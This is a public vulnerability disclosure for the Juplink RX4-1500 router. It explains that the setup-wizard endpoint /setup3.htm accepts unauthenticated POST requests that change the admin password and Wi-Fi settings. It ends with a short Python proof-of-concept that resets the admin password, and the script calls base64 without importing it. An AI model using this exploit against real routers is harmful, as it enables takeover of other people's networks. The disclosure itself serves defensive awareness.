Version 1.0.3 of the Juplink RX4-1500 router contained Incorrect Access Controls that could allow users to configure router settings unauthenticated. The vulnerability is still present as of version 1.0.5, but the vendor did not patched it. Because of this, I have decided to release the vulnerability more than 120 days after the initial disclosure as incentive to patch this critical vulnerability.

The vulnerability allowed unauthenticated users to successfully submit POST requests to /setup3.htm. Users could change the admin password, Wi-Fi SSID, Wi-Fi password, and many other configuration variables. Until version 1.0.3, this allowed for an attacker to remotely execute shell commands, as an attacker could enable the debugging telnet interface.

The critical bug is part of an endpoint that is accessed as the router runs through its setup wizard. The router firmware does not check if the router has already been configured, and thus, requests to this endpoint will always succeed.

This can be demonstrated through the following Python3 script:

#!/usr/bin/python3
import requests

# The admin password
ADMIN_PWD = "admin"

# Address of the vulnerability
addr = "http://192.168.0.1/setup3.htm"

# Set parameters
params = \
{
    'a': 'set',
    'x': 'Device.X_BROADCOM_COM_LoginCfg.',
    'AdminPassword': base64.b64encode(ADMIN_PWD.encode("utf-8"))
}

# Send post request
resp = requests.post(addr, params)